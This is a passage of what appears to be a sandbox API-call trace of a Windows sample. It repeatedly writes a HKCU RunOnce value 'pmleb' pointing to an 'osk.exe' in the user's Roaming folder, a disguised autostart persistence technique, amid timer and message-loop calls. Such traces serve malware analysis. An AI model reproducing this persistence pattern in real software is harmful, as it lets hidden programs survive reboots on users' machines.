lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.044] RegCloseKey (hKey=0x280) returned 0x0 [0084.044] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.045] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.045] SetTimer (hWnd=0x20280, nIDEvent=0x2154, uElapse=0xa, lpTimerFunc=0x0) returned 0x2154 [0084.045] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.058] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.058] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.058] KillTimer (hWnd=0x20280, uIDEvent=0x2154) returned 1 [0084.059] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.059] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.059] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.059] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.060] RegCloseKey (hKey=0x280) returned 0x0 [0084.060] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.060] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.060] SetTimer (hWnd=0x20280, nIDEvent=0x2155, uElapse=0xa, lpTimerFunc=0x0) returned 0x2155 [0084.060] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.074] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.074] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.074] KillTimer (hWnd=0x20280, uIDEvent=0x2155) returned 1 [0084.074] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.075] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.075] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.075] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.075] RegCloseKey (hKey=0x280) returned 0x0 [0084.075] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.075] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.075] SetTimer (hWnd=0x20280, nIDEvent=0x2156, uElapse=0xa, lpTimerFunc=0x0) returned 0x2156 [0084.075] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.090] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.090] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.090] KillTimer (hWnd=0x20280, uIDEvent=0x2156) returned 1 [0084.090] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.091] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.091] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.091] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.091] RegCloseKey (hKey=0x280) returned 0x0 [0084.091] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.091] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0084.091] SetTimer (hWnd=0x20280, nIDEvent=0x2157, uElapse=0xa, lpTimerFunc=0x0) returned 0x2157 [0084.091] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.105] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.105] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.105] KillTimer (hWnd=0x20280, uIDEvent=0x2157) returned 1 [0084.106] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.106] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.106] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.106] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.106] RegCloseKey (hKey=0x280) returned 0x0 [0084.106] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.107] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.107] SetTimer (hWnd=0x20280, nIDEvent=0x2158, uElapse=0xa, lpTimerFunc=0x0) returned 0x2158 [0084.107] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.121] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.121] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.121] KillTimer (hWnd=0x20280, uIDEvent=0x2158) returned 1 [0084.121] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.121] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.121] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.122] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.122] RegCloseKey (hKey=0x280) returned 0x0 [0084.122] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.122] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.122] SetTimer (hWnd=0x20280, nIDEvent=0x2159, uElapse=0xa, lpTimerFunc=0x0) returned 0x2159 [0084.122] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.155] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.155] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.156] KillTimer (hWnd=0x20280, uIDEvent=0x2159) returned 1 [0084.156] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.156] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.156] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.157] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.157] RegCloseKey (hKey=0x280) returned 0x0 [0084.157] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.157] SetTimer (hWnd=0x20280, nIDEvent=0x215a, uElapse=0xa, lpTimerFunc=0x0) returned 0x215a 
[0084.157] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.167] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.167] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.168] KillTimer (hWnd=0x20280, uIDEvent=0x215a) returned 1 [0084.168] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.168] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.168] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.169] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.169] RegCloseKey (hKey=0x280) returned 0x0 [0084.169] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.169] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.169] SetTimer (hWnd=0x20280, nIDEvent=0x215b, uElapse=0xa, lpTimerFunc=0x0) returned 0x215b [0084.169] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.183] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.183] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.183] KillTimer (hWnd=0x20280, uIDEvent=0x215b) returned 1 [0084.184] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.184] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.184] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.184] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.184] RegCloseKey (hKey=0x280) returned 0x0 [0084.184] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.184] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.185] SetTimer (hWnd=0x20280, nIDEvent=0x215c, uElapse=0xa, lpTimerFunc=0x0) returned 0x215c [0084.185] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.199] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.199] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.199] KillTimer (hWnd=0x20280, uIDEvent=0x215c) returned 1 [0084.199] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.199] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.200] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.200] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.200] RegCloseKey (hKey=0x280) returned 0x0 [0084.200] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.200] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.200] SetTimer (hWnd=0x20280, nIDEvent=0x215d, uElapse=0xa, lpTimerFunc=0x0) returned 0x215d [0084.200] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0084.214] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.214] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.214] KillTimer (hWnd=0x20280, uIDEvent=0x215d) returned 1 [0084.215] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.215] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.215] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.215] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.216] RegCloseKey (hKey=0x280) returned 0x0 [0084.216] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.216] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.216] SetTimer (hWnd=0x20280, nIDEvent=0x215e, uElapse=0xa, lpTimerFunc=0x0) returned 0x215e [0084.216] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.231] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.231] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.231] KillTimer (hWnd=0x20280, uIDEvent=0x215e) returned 1 [0084.232] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.232] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.232] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.233] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.233] RegCloseKey (hKey=0x280) returned 0x0 [0084.233] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.234] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.234] SetTimer (hWnd=0x20280, nIDEvent=0x215f, uElapse=0xa, lpTimerFunc=0x0) returned 0x215f [0084.234] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.246] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.246] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.246] KillTimer (hWnd=0x20280, uIDEvent=0x215f) returned 1 [0084.246] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.247] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.247] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.247] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.247] RegCloseKey (hKey=0x280) returned 0x0 [0084.247] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.247] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.248] SetTimer (hWnd=0x20280, nIDEvent=0x2160, uElapse=0xa, lpTimerFunc=0x0) returned 0x2160 [0084.248] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.262] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.262] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.262] KillTimer (hWnd=0x20280, uIDEvent=0x2160) returned 1 [0084.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.263] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.263] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.263] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.263] RegCloseKey (hKey=0x280) returned 0x0 [0084.263] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.264] SetTimer (hWnd=0x20280, nIDEvent=0x2161, uElapse=0xa, lpTimerFunc=0x0) returned 0x2161 [0084.264] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.277] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.277] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.277] KillTimer (hWnd=0x20280, uIDEvent=0x2161) returned 1 [0084.277] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.278] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.278] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.278] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.278] RegCloseKey (hKey=0x280) returned 0x0 [0084.278] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.279] SetTimer (hWnd=0x20280, nIDEvent=0x2162, uElapse=0xa, lpTimerFunc=0x0) returned 0x2162 [0084.279] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.293] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.293] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.293] KillTimer (hWnd=0x20280, uIDEvent=0x2162) returned 1 [0084.293] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.293] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.293] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.294] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.294] RegCloseKey (hKey=0x280) returned 0x0 [0084.294] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.294] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.294] SetTimer (hWnd=0x20280, nIDEvent=0x2163, uElapse=0xa, lpTimerFunc=0x0) returned 0x2163 [0084.294] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.309] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.309] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.309] KillTimer (hWnd=0x20280, 
uIDEvent=0x2163) returned 1 [0084.309] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.309] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.309] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.310] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.310] RegCloseKey (hKey=0x280) returned 0x0 [0084.310] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.310] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.310] SetTimer (hWnd=0x20280, nIDEvent=0x2164, uElapse=0xa, lpTimerFunc=0x0) returned 0x2164 [0084.310] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.324] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.324] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.324] KillTimer (hWnd=0x20280, uIDEvent=0x2164) returned 1 [0084.324] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.325] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.325] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.325] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.325] RegCloseKey (hKey=0x280) returned 0x0 [0084.325] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.325] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.325] SetTimer (hWnd=0x20280, nIDEvent=0x2165, uElapse=0xa, lpTimerFunc=0x0) returned 0x2165 [0084.325] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.339] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.339] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0084.340] KillTimer (hWnd=0x20280, uIDEvent=0x2165) returned 1 [0084.340] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.340] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0084.340] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0084.341] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0084.341] RegCloseKey (hKey=0x280) returned 0x0 [0084.341] IUnknown:Release (This=0x7a9740) returned 0x1 [0084.341] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0084.341] SetTimer (hWnd=0x20280, nIDEvent=0x2166, uElapse=0xa, lpTimerFunc=0x0) returned 0x2166 [0084.341] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0084.355] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0084.355] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 